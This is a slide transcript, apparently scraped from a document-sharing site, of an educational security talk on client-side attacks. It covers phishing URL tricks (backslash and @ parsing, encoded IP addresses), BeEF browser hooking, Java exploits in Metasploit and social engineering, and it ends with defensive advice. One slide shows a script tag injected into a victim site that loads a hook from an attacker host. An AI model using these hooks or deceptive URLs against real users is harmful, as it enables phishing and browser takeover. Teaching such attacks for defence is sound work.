Cyber Medical Terrorism: Hacking DNA for a Brave New World - Gregory Carpenter
Welcome to the world of hacking
-
Upload
tjylen-veselyj -
Category
Technology
-
view
1.300 -
download
5
description
Transcript of Welcome to the world of hacking
![Page 1: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/1.jpg)
Welcome to the world of
HACKINGby Nazar Tymoshyk, R&D team, SoftServe& Bohdan Serednyskyj, R&D team, SoftServe
![Page 2: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/2.jpg)
What this topic is about?
![Page 3: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/3.jpg)
Як це бачать друзі Що думає мама Як сприймає суспільство
Як це бачить влада Як уявляю собі це я А що є насправді
![Page 4: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/4.jpg)
This is more educational topic, not motivational
![Page 5: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/5.jpg)
Amateurs hacks - systems, Professionals hacks - PEOPLE
Client Side Attacks
![Page 6: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/6.jpg)
![Page 7: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/7.jpg)
About me
![Page 8: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/8.jpg)
Feel free to ask me anything :)
![Page 9: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/9.jpg)
Best SoftServe Team – R&D
![Page 10: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/10.jpg)
Security TeamNazar TymoshykCEH, HP FSTS, CIW WSS, Cisco SS, ZSS, CLE, DCTS, DCATS,NAI,CLP,NLTS,CNA,NCLA,MCTS
Bohdan SerednytskyiCEH, MSTC Security, ZSS
![Page 11: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/11.jpg)
Certifications
Ph.D in Security
Identity & Security
SoftServe experts are certified in HP Fortify
Security Testing solution
![Page 12: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/12.jpg)
Time for fun. Just relax
![Page 13: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/13.jpg)
Target – web users
![Page 14: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/14.jpg)
Everybody knows that Government is spying us
![Page 15: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/15.jpg)
Every day we are getting suspicious emails
![Page 16: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/16.jpg)
And online promotions
Yes!!! Just click link below
![Page 17: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/17.jpg)
Quick Quiz
1. Will this URL work in IE?
http:\\example.com\
2. What page will be opened in Firefox browser after entering this URL?
http://example.com\@coredump.cx/
1. Yes. IE and most browsers parse “\” as “/” for usability reasons.
2. In Firefox, that URL will take the user to coredump.cx, because example.com\ will be interpreted as a valid value for the login field. In almost all other browsers, “\” will be interpreted as a path delimiter, and the user will land on example.com instead.
Answers
![Page 18: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/18.jpg)
Now try it by yourself and answer what you get?!
![Page 19: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/19.jpg)
Tricky URLs
For all browsershttp://example.com&gibberish=1234@167772161/
And http://example.com\@coredump.cx/ is http://example.com/ for all…
![Page 20: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/20.jpg)
This is it!
For all browsershttp://example.com&gibberish=1234@167772161/
And http://example.com\@coredump.cx/ is http://example.com/ for all…
is http://10.0.0.1/
…but for Firefox it’s http://coredump.cx/
![Page 21: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/21.jpg)
Cheatershttp://example.com/.wholesome-domain.com/
This only looks like a real Slash.Read: Evgeniy Gabrilovich and Alex Gontmakher “The Homograph Attack”
![Page 22: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/22.jpg)
Server addresses
•http://127.0.0.1/ This is a canonical representation of an IPv4 address.
•http://0x7f.1/ This is a representation of the same address that uses a hexadecimal number to represent the first octet and concatenates all the remaining octets into a single decimal value.
•http://017700000001/ The same address is denoted using a 0-prefixed octal value, with all octets concatenated into a single 32-bit integer.
![Page 23: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/23.jpg)
Now attention
![Page 24: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/24.jpg)
Recommended Book
![Page 25: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/25.jpg)
DEMO I
![Page 26: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/26.jpg)
BeeF – Browser exploitation framework
![Page 27: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/27.jpg)
Our victim site <script src=http://attackersite/hook.js></script>
http://192.168.241.240:8882
![Page 28: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/28.jpg)
Now about Java
![Page 29: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/29.jpg)
Everybody likes Java
![Page 30: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/30.jpg)
Butthere is a small problem
in 2013
![Page 31: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/31.jpg)
![Page 32: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/32.jpg)
Java exploits in Metasploit 4
Status - Excellent
![Page 33: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/33.jpg)
JVM vulnerabilities
![Page 34: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/34.jpg)
DEMO II
![Page 35: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/35.jpg)
Social Engineering TOolkit
![Page 36: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/36.jpg)
Consequences
• Stolen Developer Cloud access Certificates• Malware and Spyware on PC and mobile• Key loggers • Money Lost – Paypal, webmoney, etc.• Email – recovery and steal accounts• SHAME!
![Page 37: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/37.jpg)
Recommendations
• Up to date JAVA and all other software• Antivirus – Kasper rocks!• Encrypted keys to infrastructure• 2 factor authentication everywhere
(email first)• Verify yourself and your browser on …
•Attention
![Page 38: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/38.jpg)
OWASP Secure Coding Guide
![Page 39: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/39.jpg)
Apache Shiro
![Page 40: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/40.jpg)
OWASP WebGoat, DVWA - Train yourself in Security
![Page 41: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/41.jpg)
Hope you like it!